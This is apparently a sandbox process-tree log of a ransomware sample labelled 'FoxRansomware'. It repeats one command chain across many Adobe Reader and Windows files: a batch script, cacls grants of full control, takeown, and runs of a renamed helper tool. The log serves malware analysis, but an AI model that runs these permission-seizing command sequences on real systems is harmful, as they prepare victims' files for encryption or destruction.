C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:4876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:5108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_super.gif" -nobanner3⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:3932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_browser.gif" -nobanner3⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "review_browser.gif" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:3720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:2404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:2684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tl.gif" -nobanner3⤵PID:2660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "tl.gif" -nobanner4⤵PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:3688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-V" -nobanner3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "Identity-V" -nobanner4⤵PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:3172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:3488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:3860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:2784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:3800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:2624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵
- Modifies file permissions
PID:3816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt55.ths" -nobanner3⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt55.ths" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:3848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.hsp" -nobanner3⤵PID:1396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:3532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:3916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:3920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:2456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:2052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:2840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "device.png" -nobanner3⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "device.png" -nobanner4⤵PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:1356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:2380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:3116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner3⤵PID:3256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "tasks.xml" -nobanner4⤵PID:4160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:2740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:2596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:2060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "RTC.der" -nobanner3⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "RTC.der" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:3124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:4156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:3396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "end_review.gif" -nobanner3⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "end_review.gif" -nobanner4⤵PID:552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:2304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:1592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:2552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:4120
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:3864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_ok.gif" -nobanner3⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "server_ok.gif" -nobanner4⤵PID:4132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:2872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:2664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "warning.gif" -nobanner3⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "warning.gif" -nobanner4⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:4020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:4008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:3700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:3380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:2992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:2180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:3684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SY______.PFB" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:3408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.hyp" -nobanner3⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt.hyp" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:3040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:3100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng32.clx" -nobanner3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "eng32.clx" -nobanner4⤵PID:3288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:4016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵
- Modifies file permissions
PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:3160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:1268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:4208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:4224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:2108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:4280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:4308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:4332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:4268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:4348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviewers.gif" -nobanner3⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviewers.gif" -nobanner4⤵PID:4376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:4428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:4356
-
-
